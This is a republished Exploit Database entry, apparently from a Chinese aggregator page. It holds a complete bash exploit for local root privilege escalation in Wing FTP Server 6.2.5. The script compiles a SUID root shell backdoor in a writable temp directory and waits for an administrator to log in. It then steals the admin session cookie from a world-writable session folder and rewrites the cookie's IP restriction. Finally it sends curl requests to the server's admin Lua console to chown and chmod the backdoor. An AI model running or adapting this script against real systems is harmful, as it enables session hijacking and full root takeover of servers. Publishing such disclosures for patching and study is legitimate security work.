Wing FTP Server 6.2.5 – Privilege Escalation

• Exploit Database
• 13 阅读

• 作者： Cary Hooper
  日期： 2020-03-02
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/48154/

• # Exploit Title: Wing FTP Server 6.2.5 - Privilege Escalation
  # Google Dork: intitle:"Wing FTP Server - Web"
  # Date: 2020-03-03
  # Exploit Author: Cary Hooper
  # Vendor Homepage: https://www.wftpserver.com
  # Software Link: https://www.wftpserver.com/download/wftpserver-linux-64bit.tar.gz
  # Version: v6.2.5 and prior
  # Tested on: Ubuntu 18.04
  # CVE: N/A
  
  # If $_WINGFTPDIR is the installation directory where Wing FTP was installed,
  # $_WINGFTPDIR/wftpserver/session/* --> corresponds to user sessions... world readable/writeable (possibly exploitable)
  # $_WINGFTPDIR/wftpserver/session_admin/* --> corresponds to admin sessions... world readable/writeable.
  # We can wait for an admin to log in, steal their session, then launch a curl command which executes LUA.
  # https://www.hooperlabs.xyz/disclosures/cve-2020-9470.php (writeup)
  
  
  
  #!/bin/bash
  
  echo 'Local root privilege escalation for Wing FTP Server (v.6.2.5)'
  echo 'Exploit by Cary Hooper (@nopantrootdance)'
  
  function writeBackdoor() {
  	#this function creates a backdoor program (executes bash)
  	echo "Writing backdoor in $1"
  	echo '#include <stdio.h>' > $1/foobarh00p.c
  	echo '#include <sys/types.h>' >> $1/foobarh00p.c
  	echo '#include <unistd.h>' >> $1/foobarh00p.c
  	echo 'int main(void){setuid(0); setgid(0); system("/bin/bash");}' >> $1/foobarh00p.c
  	gcc -w $1/foobarh00p.c -o $1/foobarh00p
  }
  
  function makeRequest() {
  	#Executes Lua command in admin panel to set the suid bit/chown on our backdoor
  	#Change owner to root
  	curl -i -k -b "UIDADMIN=$1" --data "command=io.popen('chown%20root%20$2%2Ffoobarh00p')" 'http://127.0.0.1:5466/admin_lua_script.html?r=0.08732964480139693' -H "Referer: http://127.0.0.1:5466/admin_lua_term.html">/dev/null 2>/dev/null
  	#Make SUID
  	curl -i -k -b "UIDADMIN=$1" --data "command=io.popen('chmod%204777%20$2%2Ffoobarh00p')" 'http://127.0.0.1:5466/admin_lua_script.html?r=0.08732964480139693' -H "Referer: http://127.0.0.1:5466/admin_lua_term.html">/dev/null 2>/dev/null
  }
  
  directories=( "/tmp" "/var/tmp" "/dev/shm" )
  for dir in "${directories[@]}"
  do
  	#Check if directories are writeable
  	if [ -w $dir ]
  	then 
  		echo "[!] Writeable directory found: $dir"
  		export backdoordir=$dir
  		break
  	else 
  		echo "$dir is not writeable..."; fi
  done
  
  writeBackdoor $backdoordir
  
  #Look for directory where administrative sessions are handled ($_WINGFTPDIR/session_admin/).
  echo "Finding the wftpserver directory"
  export sessiondir=$(find / -name session_admin -type d 2>/dev/null | grep --color=never wftpserver)
  if [ -z "$sessiondir" ]; then echo "Wing FTP directory not found.Consider looking manually."; exit 1; fi
  #Note: if no directory is found, look manually for the "wftpserver" directory, or a "wftpserver" binary.Change the variable below and comment out the code above.
  #export sessiondir="/opt/wftpserver/session_admin"
  
  #While loop to wait for an admin session to be established.
  echo "Waiting for a Wing FTP admin to log in.This may take a while..."
  count=0
  while : ; do
  	if [ "$(ls -A $sessiondir)" ]; then
  		#If a session file exists, the UID_ADMIN cookie is the name of the file.
  		echo "[!] An administrator logged in... stealing their session."
  		export cookie=$(ls -A $sessiondir | cut -d '.' -f1)
  		export ip=$(cat $sessiondir/$cookie.lua | grep ipaddress| cut -d '[' -f4 | cut -d ']' -f1)
  		echo "Changing IP restrictions on the cookie..."
  		cat $sessiondir/$cookie.lua | sed "s/$ip/127.0.0.1/g" > $backdoordir/$cookie.lua
  		cp $backdoordir/$cookie.lua $sessiondir/$cookie.lua
  		rm $backdoordir/$cookie.lua
  		echo "[!] Successfully stole session."
  		#Once found, make the malicious curl request
  		export urldir=$(sed "s/\//\%2F/g" <<<$backdoordir)
  		echo "Making evil request as Wing FTP admin... (backdoor in ${backdoordir})"
  		makeRequest $cookie $urldir
  		break
  	else
  		#Checks every 10 seconds.Outputs date to terminal for user feedback purposes only.
  		sleep 10
  		let "count+=1"
  		if [ $count -eq 10 ]; then date; fi
  		echo "..."
  	fi
  done
  
  #Check if backdoor was created correctly
  if [ $(stat -c "%a" $backdoordir/foobarh00p) != "4777" ]; then echo "Something went wrong.Backdoor is not SUID"; exit 1; fi
  if [ $(stat -c "%U" $backdoordir/foobarh00p) != "root" ]; then echo "Something went wrong.Backdoor is not owned by root"; exit 1; fi
  
  echo "Backdoor is now SUID owned by root."
  echo "[!] Executing backdoor. Cross your fingers..."
  #Execute the backdoor... root!
  $backdoordir/foobarh00p